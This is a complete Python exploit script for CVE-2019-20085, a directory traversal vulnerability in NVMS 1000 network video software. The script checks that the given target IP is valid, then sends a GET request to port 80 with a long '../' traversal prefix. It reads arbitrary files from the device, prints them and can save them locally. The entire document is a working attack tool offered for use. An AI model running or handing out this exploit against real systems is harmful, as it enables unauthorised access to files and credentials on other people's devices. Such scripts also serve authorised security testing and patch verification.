#!/usr/bin/python3 # Title: NVMS 1000 - Directory Traversal Attack # CVE: CVE - 2019-20085 # Date: 15 April 2020 # Author: @AleDiBen # Vendor Homepage: http://en.tvt.net.cn/ # Software Link: http://en.tvt.net.cn/products/188.html # Original Author: Numan Türle import sys from urllib3 import HTTPConnectionPool import time import re rgxip = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$") class bcolors: HEADER = '\033[34m' OK = '\033[32m' WARN = '\033[33m' ERR = '\033[31m' END = '\033[0m' def usage(): print(bcolors.HEADER, end="") print("****************************************************************") print("** ~CVE 2019-20085~ **") print("****************************************************************") print(bcolors.END) print("USAGE :\n\t./nvms.py [OUT_FILE]") print("EXAMPLE:\n\tpython nvms.py 195.135.100.10 Windows/system.ini win.ini\n") def isint(string): try: int(string) return True except: return False def parse_input(args): _local_path = None _ip = args[0] _target_file = args[1] iperr = False if(len(args)==3): _local_path = args[2] split = _ip.split('.') for x in split: if not isint(x): iperr = True elif int(x) > 255: iperr = True if(rgxip.match(_ip) == None or iperr): print(bcolors.ERR + "[-]" + bcolors.END + " Please insert a valid IP Address") exit(-1) _url = "http://"+_ip+"/" return _url, _ip, _target_file, _local_path if(len(sys.argv[1:]) < 2): usage() else: url, ip, target_file, local_path = parse_input(sys.argv[1:]) traversal = "/../../../../../../../../../../../../../../" headers = { 'Host':ip, 'User-Agent':'customUserAgent', 'Accept':'*/*', 'Referer':url, 'Content-Length':'2' } try: pool = HTTPConnectionPool(host=ip, port=80) res = pool.request('GET', traversal + target_file, headers) data = res.data.decode('utf-8') except: print(bcolors.ERR + "[-]" + bcolors.END + " Host not reachable!") exit(-1) if res.status == 200: print(bcolors.OK + "[+]" + bcolors.END + " DT Attack Succeeded") if(local_path != None): print(bcolors.OK + "[+]" + bcolors.END + " Saving File Content") f = open(local_path, "w") f.write(data) f.write("\n") f.close() print(bcolors.OK + "[+]" + bcolors.END + " Saved") print(bcolors.OK + "[+]" + bcolors.END + " File Content\n") print(bcolors.WARN, end="") print("++++++++++ BEGIN ++++++++++") print(data) print("++++++++++ END ++++++++++") print(bcolors.WARN) else: print(bcolors.ERR + "[-]" + bcolors.END + " Host not vulnerable!") exit(0)